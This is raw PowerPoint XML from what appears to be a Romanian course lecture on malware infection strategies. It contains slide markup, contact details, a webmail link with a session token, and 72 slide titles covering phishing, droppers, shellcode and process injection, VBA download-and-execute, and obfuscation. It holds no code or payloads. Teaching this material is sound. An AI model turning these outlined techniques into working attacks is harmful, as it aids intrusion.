                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tel.: 0267-364 054</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>fax: 0267-364 130</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0896FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0896FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ww.nexxon-utilajeagricole.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:hlinkClick r:id="rId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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="1F497D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 2" descr="https://mail.acad.ro/rc/?_task=mail&amp;_action=get&amp;_mbox=INBOX&amp;_uid=44762&amp;_token=gEGJkb1YefU2iySmrvKf4y4cG2LXBgDK&amp;_part=3&amp;_embed=1&amp;_mimeclass=image">
            <a:hlinkClick r:id="rId2"/>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1767523" y="4274566"/>
            <a:ext cx="1304925"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FB UA">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1767523" y="5188966"/>
            <a:ext cx="2162175"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7975" y="2591947"/>
            <a:ext cx="3268429" cy="3268429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="851494920"/>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4.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3356</TotalTime>
  <Words>13154</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1201</Paragraphs>
  <Slides>72</Slides>
  <Notes>12</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Fonts Used</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>22</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>4</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>72</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="98" baseType="lpstr">
      <vt:lpstr>Agency FB</vt:lpstr>
      <vt:lpstr>arial</vt:lpstr>
      <vt:lpstr>arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>BankinterMedium</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Dividend</vt:lpstr>
      <vt:lpstr>1_Main Event</vt:lpstr>
      <vt:lpstr>1_Dividend</vt:lpstr>
      <vt:lpstr>C.12 Strategii de infectie</vt:lpstr>
      <vt:lpstr>Principalele părți ale prezentării</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>C.12.1 Phising</vt:lpstr>
      <vt:lpstr>Phising</vt:lpstr>
      <vt:lpstr>Phising Ce este un atac de tip spoofing?</vt:lpstr>
      <vt:lpstr>Pishing Puncte de atenție pentru identificarea phishing-ului:</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (1)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (2)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (3) – Explicație - Acțiune urgentă - Amenințare</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (4)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (5)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (6)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (7); (mostra - Ana)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (8)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (9)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (10)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (11)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (12)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (13)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (14)</vt:lpstr>
      <vt:lpstr>Phising Cazuistică (15)</vt:lpstr>
      <vt:lpstr>Phising decodarea link-ului</vt:lpstr>
      <vt:lpstr>Phising Decodare Base64 online</vt:lpstr>
      <vt:lpstr>Phising Atac in trepte</vt:lpstr>
      <vt:lpstr>URGENT: Activitate suspectă identificată pe contul dumneavoastră de GitHub</vt:lpstr>
      <vt:lpstr>Mascarea email-ului sursă</vt:lpstr>
      <vt:lpstr>C.12.2 Droppers</vt:lpstr>
      <vt:lpstr>Constructori Cum arata un droper? Scriere pe disc vs scriere in memoria RAM</vt:lpstr>
      <vt:lpstr>Dropere - Shell code</vt:lpstr>
      <vt:lpstr>C.12.3 Injectia de cod masina</vt:lpstr>
      <vt:lpstr>Shellcode  in diferite tipuri de surse</vt:lpstr>
      <vt:lpstr>Dropper update descărcare și execuție shellcode</vt:lpstr>
      <vt:lpstr>Injectia de Shellcode (I)</vt:lpstr>
      <vt:lpstr>Procesul de injecție de shellcode</vt:lpstr>
      <vt:lpstr>Injectia de Shellcode (II)</vt:lpstr>
      <vt:lpstr>Detaliile tehnice ale funcțiilor utilizate </vt:lpstr>
      <vt:lpstr>Injectare procese (I)</vt:lpstr>
      <vt:lpstr>Tehnica de injectare a proceselor</vt:lpstr>
      <vt:lpstr>Injectare procese (II)</vt:lpstr>
      <vt:lpstr>Detaliile tehnice ale procesului de injectare</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Ce observam?</vt:lpstr>
      <vt:lpstr>Download File &amp; Process List (API permite injectia de cod si din mediul VBA) Visual Basic for Applications</vt:lpstr>
      <vt:lpstr>Visual Basic for Applications (VBA) pentru operarea cu fișiere și procese</vt:lpstr>
      <vt:lpstr>Execute Binary Visual Basic for Applications</vt:lpstr>
      <vt:lpstr>Automatizari Proceduri documente macro</vt:lpstr>
      <vt:lpstr>dropere</vt:lpstr>
      <vt:lpstr>C.12.4 Metode de exploit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C.12.5 Ofruscarea</vt:lpstr>
      <vt:lpstr>Ofruscarea emergenta</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare</vt:lpstr>
      <vt:lpstr>Ofruscari</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare - transformari</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare - transformari</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare - transformari</vt:lpstr>
      <vt:lpstr>Ofruscarea alte tehnici de ofuscare - transformari</vt:lpstr>
      <vt:lpstr>Ofruscarea exemplu</vt:lpstr>
      <vt:lpstr>ofruscarea</vt:lpstr>
      <vt:lpstr>Ofruscarea criptare vs executie dinamica</vt:lpstr>
      <vt:lpstr>Ofruscarea criptare vs executie dinamica</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274</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-20T09:23:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-05T00:49:23Z</dcterms:modified>
</cp:coreProperties>
</file>